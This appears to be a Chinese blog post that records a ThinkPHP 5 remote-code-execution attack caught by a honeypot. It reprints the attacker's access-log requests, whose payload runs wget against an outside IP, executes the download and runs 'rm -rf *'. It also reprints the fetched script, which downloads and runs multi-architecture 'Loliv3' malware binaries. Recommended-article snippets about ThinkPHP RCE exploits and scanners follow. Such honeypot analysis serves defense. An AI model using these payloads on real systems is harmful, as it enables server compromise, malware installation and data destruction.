php rce,批量thinkphp5的RCE漏洞利用

最新推荐文章于 2025-02-10 20:25:15 发布
最新推荐文章于 2025-02-10 20:25:15 发布
阅读量334 收藏
点赞数
文章标签: php rce
本文记录了一次通过蜜罐系统捕获的远程代码执行(RCE)攻击案例。攻击者尝试利用ThinkPHP框架的漏洞,通过GET请求注入恶意代码以下载并执行恶意脚本。文中详细展示了攻击者的请求过程及所使用的命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

蜜罐捕获攻击

212.237.14.55 - - [22/Dec/2018:13:17:50 +0800] "GET /public/index.php?s=/index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://142.93.197.215/sh;%20chmod%20777%20sh;%20./sh;%20rm%20-rf%20* HTTP/1.1" 404 162 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.23.1.el6.x86_64"

212.237.14.55 - - [22/Dec/2018:17:59:48 +0800] "GET /public/index.php?s=/index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://142.93.197.215/php;chmod%20777%20php;./php;rm%20-rf%20* HTTP/1.1" 404 162 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.23.1.el6.x86_64"

利用RCE获取远程服务器文件:

http://142.93.197.215/php

binarys="mips mpsl arm arm5 arm6 arm7 sh4 ppc x86 arc"

server_ip="142.93.197.215"

binname="Loliv3"

execname="LoliSecHoe"

for arch in $binarys

do

cd /tmp

wget http://$server_ip/$binname.$arch -O $execname

chmod 777 $execname

./$execname Think.php

rm -rf $execname

done

写入并执行

Loliv3.arc

Loliv3.arm

Loliv3.arm5

Loliv3.arm6

Loliv3.arm7

Loliv3.mips

Loliv3.mpsl

Loliv3.ppc

Loliv3.sh4

Loliv3.x86

php

连接Think.php

曹名
关注
python——脚本实现检测目标ip是否存在rce漏洞
记录并分享学习安全的知识点..
01-24 1546
python爬虫——request模块(一)_xiaofengdada的博客-CSDN博客_python request python——正则表达式(一)_xiaofengdada的博客-CSDN博客 代码如下: import re import requests url = input("请输入你需要查询的网址:") header = { 'Cookie':'PHPSESSID=tsvp6h1gsr4g89p03ptggmtu2i' } symbol = ['|','||','&','&a
php5漏洞汇总,ThinkPHP 5.x RCE 漏洞分析与利用总结
weixin_34931142的博客
03-19 1362
一、ThinkPHP 5.0.23 rce漏洞复现与总结漏洞复现thinkphp 5.0.23 rcethinkphp 5.0.23 rce源码下载:github:https://github.com/top-think/framework/tree/v5.0.23影响版本ThinkPHP 5.0系列 < 5.0.23ThinkPHP 5.1系列 < 5.1.31安全版本ThinkPH...
ThinkPHP RCE漏洞分析合集
hackzkaq的博客
03-18 4541
更多黑客技能 公众号:暗网黑客 作者:掌控安全-veek 一. ThinkPHP 5.0.10-3.2.3 缓存函数设计缺陷可导致代码执行 0x00 背景 网站为了提高访问效率往往会将用户访问过的页面存入缓存来减少开销。 而Thinkphp 在使用缓存的时候是将数据序列化,然后存进一个 php 文件中,这使得命令执行等行为成为可能。 0x01 实验环境 系统环境 服务器主机:centOS 7 php 5.4版本,apache2,ThinkPHP 5.0.10 0x02 漏洞利用 将 applicati
thinkphp 一键漏洞检测
12-09
thinkphp 一键漏洞检测,V3.2.0~V5.1.23,都可进行测试
(30)【RCE集合】RCE漏洞的原理、出现地方、相关命令、函数解析、利用详细的过程
04-09 2970
详细理解RCE漏洞
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析 ThinkPHP 是一个流行的 PHP 框架,它提供了许多实用的功能来帮助开发者快速构建 Web 应用程序。然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE...
ThinkPHP5 5.0.23-rce远程代码执行漏洞复现
qq_45079558的博客
09-08 451
其版本5中,由于框架对控制器名没有进行足够的检测,会导致在没有开启强制路由的情况下可执行任意方法,从而导致远程命令执行漏洞。通过echo命令写入 Webshell 文件,首先将一句话木马进行Base64 编码。判断是否存在漏洞:访问/index.php?s=captcha页面,会出现如下报错。切换目录到vulhub/thinkphp/5.0.23-rce下。使用HackBar 插件发送 POST 请求。端口为:8080,访问网站,搭建成功。访问shell.php,使用蚁剑连接。
基于JavaFx的ThinkPHP漏洞扫描工具---RexHa(Aazhen)的一些说明
10-18 7810
基于JavaFx的Thinkphp漏洞扫描工具Rexha的一些使用说明。支持多种payload。多线程并发批量扫描。支持漏洞类型包括:ThinkPHP-2.x-RCE",ThinkPHP-5.0.23-RCE","ThinkPHP5.0.x-5.0.23通杀RCE","ThinkPHP5-SQL注入&敏感信息泄露","ThinkPHP 3.x 日志泄露NO.1","ThinkPHP 3.x 日志泄露NO.2","ThinkPHP 5.x 数据库信息泄露"。
RCE漏洞基础初了解
m0_68976043的博客
08-12 838
所谓rce简单来说就是可以执行系统命令的函数,举个例子php
phpStudy_2016-2018_RCE漏洞的检测利用脚本编写
weixin_44801963的博客
09-25 610
文章目录前言一、phpStudy_2016-2018存在什么漏洞二、EXP脚本编写1.目标存活检测2.漏洞触发3.完整代码总结 前言 本章主要针对phpStudy_2016-2018_RCE 漏洞编写EXP,复现该漏洞利用过程。文中内容涉及技术仅供个人学习参考。目前恶意植入该漏洞后门的犯罪者已伏法。 关于phpStudy_2016-2018_RCE 漏洞的详细介绍参考:https:// 一、phpStudy_2016-2018存在什么漏洞 phpStudy_2016-2018中存在RCE(remote.
ThinkPHP5_RCE
Dikesi的博客
02-10 500
ThinkPHP 5.x版本 RCE漏洞
有趣的的rce漏洞复现分析
huizhaohaha的博客
08-13 841
这时候又遇到一个问题啦,难道我们要一个一个试吗,不,作为一个学习网络安全的同学,有必要掌握至少一门的脚本编程语言,来提高我们的办事效率。这个时候,我们是理解了这个代码过滤了大小写和数字,那我们该如何成功拿下这个呢,根据代码的意思是我们通过get传参进行传递参数,那我们如何不做任何绕过,那么估计会触发输出hacker,我们先试一下触发后的情况。- `preg_match('/[a-z0-9]/i',$code)`:这个正则表达式匹配大小写不敏感的字母(`a-zA-Z`)或数字(`0-9`)。
ThinkPHP5代码审计【RCE
D.MIND 的博客
05-14 1410
composer create-project --prefer-dist topthink/think=5.0.23 thinkphp_5.0.23
学习笔记-ThinkPHP5之任意方法调用RCE(六)
人饭子的博客
11-09 505
书接上文 利用method的任意方法调用,调用构造函数__construct,且调用时会传入$_POST数据,那么组合起来就是执行method方法可以控制类的成员变量的值。 filterValue中存在 call_user_func函数可以恶意利用,关注其参数$filters是否可控。 getFilter方法存在这样$filter = $filter ?: $this->filter;...
Thinkphp 缓存RCE
weixin_30635053的博客
06-16 651
5.0.0<=ThinkPHP5<=5.0.10。 漏洞利用条件: 1.基于tp5开发的代码中使用了Cache::set 进行缓存 2.在利用版本范围内 3.runtime目录可以访问 扩展: 1.不可访问,可以考虑包含。前提要找到包含处。//Tp有一个Cache一个包含 2.利用缓存,做一个长期的shell动态生成。 ...
ThinkPHP5--rce远程代码执行
m0_74402888的博客
04-30 1378
ThinkPHP5版本中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞
[代码审计]ThinkPHP 5.0.x 变量覆盖导致的RCE分析
Huamang的博客
11-26 5689
前言 漏洞存在版本,分为两大版本: ThinkPHP 5.0-5.0.24 ThinkPHP 5.1.0-5.1.30 环境搭建 composer create-project topthink/think=5.0.5 thinkphp5.0.5 --prefer-dist 修改composer.json "require": { "php": ">=5.4.0", "topthink/framework": "5.0.5" }, 执行composer update
thinkphp5 RCE漏洞分析
最新发布
02-22
### ThinkPHP5 RCE漏洞详细分析 #### 漏洞概述 ThinkPHP是一款广泛使用的PHP开发框架,在多个版本中存在远程代码执行(RCE)漏洞。这些漏洞主要由变量覆盖引起,特别是在`thinkphp/library/think/Request.php`文件中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值